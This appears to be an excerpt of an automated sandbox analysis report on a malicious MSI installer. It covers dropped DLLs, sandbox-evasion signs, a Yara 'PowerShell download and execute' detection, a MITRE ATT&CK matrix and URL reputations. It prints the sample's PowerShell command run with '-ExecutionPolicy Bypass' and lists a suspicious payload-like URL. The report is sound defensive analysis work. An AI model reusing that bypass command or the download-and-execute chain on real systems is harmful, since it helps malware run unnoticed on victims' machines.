Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe

Code function: 9_2_00007FF63EDC06F0 rdtsc

9_2_00007FF63EDC06F0

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6229			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3605			Jump to behavior

Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Dropped PE file which has not been started: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome_pwa_launcher.exe	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI3D2C.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\appData\xmpp.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI435B.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Dropped PE file which has not been started: C:\ProgramData\Chrome\Application\118.0.5993.120\vulkan-1.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\appData\vcomp140_app.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\appData\mrt100_app.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI3CCD.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI3DBC.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\appData\vcamp140_app.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI3D6C.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI3D4C.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\appData\vccorlib140_app.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Dropped PE file which has not been started: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome_elf.dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe

API coverage: 1.4 %

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7792	Thread sleep count: 6229 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7792	Thread sleep count: 3605 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7824	Thread sleep time: -17524406870024063s >= -30000s	Jump to behavior

Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior

Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe

Code function: 8_2_00007FFE007AA230 FindFirstFileExW,FindClose,wcscpy_s,_invalid_parameter_noinfo_noreturn,

8_2_00007FFE007AA230

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: powershell.exe, 00000003.00000002.2006872673.0000000000539000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: }\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}ttG[
Source: powershell.exe, 00000003.00000002.2006872673.0000000000539000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
Source: powershell.exe, 00000003.00000002.2011514359.0000000006B30000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
Source: powershell.exe, 00000003.00000002.2012217755.0000000006BED000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\System32\msiexec.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe

Code function: 9_2_00007FF63EDC06F0 rdtsc

9_2_00007FF63EDC06F0

Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe

Code function: 8_2_00007FF6194940E0 GetCurrentThreadId,IsDebuggerPresent,OutputDebugStringW,

8_2_00007FF6194940E0

Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe

Code function: 8_2_00007FF619492AA0 LoadLibraryW,GetProcAddress,LoadLibraryW,GetProcAddress,LoadLibraryW,GetProcAddress,FreeLibrary,

8_2_00007FF619492AA0

Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe

Code function: 8_2_00007FF619496CB0 GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

8_2_00007FF619496CB0

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe

Code function: 9_2_00007FF63EEDD548 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

9_2_00007FF63EEDD548

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: Br_i421i2-2481-125_754864.msi, type: SAMPLE
Source: Yara match	File source: amsi32_7712.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7712, type: MEMORYSTR
Source: Yara match	File source: C:\Windows\Installer\MSI3E49.tmp, type: DROPPED
Source: Yara match	File source: C:\Config.Msi\4b3b29.rbs, type: DROPPED
Source: Yara match	File source: C:\Windows\Installer\4b3b27.msi, type: DROPPED

Bypasses PowerShell execution policy

Source: C:\Windows\SysWOW64\msiexec.exe

Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss43F5.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi43E2.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr43E3.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr43E4.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."

Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss43F5.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi43E2.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr43E3.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr43E4.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe "C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe"			Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -noprofile -noninteractive -executionpolicy bypass -file "c:\users\user\appdata\local\temp\pss43f5.ps1" -propfile "c:\users\user\appdata\local\temp\msi43e2.txt" -scriptfile "c:\users\user\appdata\local\temp\scr43e3.ps1" -scriptargsfile "c:\users\user\appdata\local\temp\scr43e4.txt" -propsep " :<->: " -linesep " <<:>> " -testprefix "_testvalue."
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -noprofile -noninteractive -executionpolicy bypass -file "c:\users\user\appdata\local\temp\pss43f5.ps1" -propfile "c:\users\user\appdata\local\temp\msi43e2.txt" -scriptfile "c:\users\user\appdata\local\temp\scr43e3.ps1" -scriptargsfile "c:\users\user\appdata\local\temp\scr43e4.txt" -propsep " :<->: " -linesep " <<:>> " -testprefix "_testvalue."			Jump to behavior

Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe

Code function: ___lc_locale_name_func,GetLocaleInfoEx,

8_2_00007FFE007CFAE0

Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe

Code function: 8_2_00007FF619491954 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

8_2_00007FF619491954

Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe

Code function: 9_2_00007FF63EDBD9E0 GetVersionExW,GetProductInfo,GetNativeSystemInfo,

9_2_00007FF63EDBD9E0

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	1 Replication Through Removable Media	1 Command and Scripting Interpreter	1 DLL Side-Loading	11 Process Injection	21 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	Boot or Logon Initialization Scripts	1 DLL Side-Loading	21 Virtualization/Sandbox Evasion	LSASS Memory	31 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	Junk Data	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	Logon Script (Windows)	Logon Script (Windows)	11 Process Injection	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Steganography	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	21 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Software Packing	Cached Domain Credentials	11 Peripheral Device Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	2 File and Directory Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 File Deletion	Proc Filesystem	25 System Information Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Br_i421i2-2481-125_754864.msi	3%	ReversingLabs

Dropped Files

Source	Detection	Scanner
C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.14	0%	ReversingLabs
C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.50	0%	ReversingLabs
C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	0%	ReversingLabs
C:\ProgramData\Chrome\Application\118.0.5993.120\chrome_pwa_launcher.exe	0%	ReversingLabs
C:\ProgramData\Chrome\Application\118.0.5993.120\vulkan-1.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\appData\mrt100_app.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\appData\msvcp140_app.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\appData\vcamp140_app.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\appData\vccorlib140_app.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\appData\vcomp140_app.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\appData\vcruntime140_app.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\appData\xmpp.dll	0%	ReversingLabs
C:\Windows\Installer\MSI3CCD.tmp	0%	ReversingLabs
C:\Windows\Installer\MSI3D2C.tmp	0%	ReversingLabs
C:\Windows\Installer\MSI3D4C.tmp	0%	ReversingLabs
C:\Windows\Installer\MSI3D6C.tmp	0%	ReversingLabs
C:\Windows\Installer\MSI3DBC.tmp	0%	ReversingLabs
C:\Windows\Installer\MSI435B.tmp	0%	ReversingLabs

Source	Detection	Scanner	Label
http://nuget.org/NuGet.exe	0%	URL Reputation	safe
https://crashpad.chromium.org/	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	100%	URL Reputation	malware
http://schemas.xmlsoap.org/soap/encoding/	0%	URL Reputation	safe
http://www.apache.org/licenses/LICENSE-2.0.html	0%	URL Reputation	safe
https://go.micro	0%	URL Reputation	safe
https://crashpad.chromium.org/bug/new	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
http://schemas.xmlsoap.org/soap/envelope/	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://crashpad.chromium.org/https://crashpad.chromium.org/bug/new	0%	URL Reputation	safe
http://www.borland.com/namespaces/Types	0%	URL Reputation	safe
https://aka.ms/pscore6lB	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://nuget.org/nuget.exe	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://jaspreser.dev.br/.well-known/acme-challenge/Relatorios_xls_mensal	0%	Avira URL Cloud	safe
http://www.apachefriends.org/f/viewforum.php?f=4	0%	Avira URL Cloud	safe
http://tools.ietf.org/html/rfc1321	0%	Avira URL Cloud	safe
http://www.movable-type.co.uk/scripts/xxtea.pdf	0%	Avira URL Cloud	safe
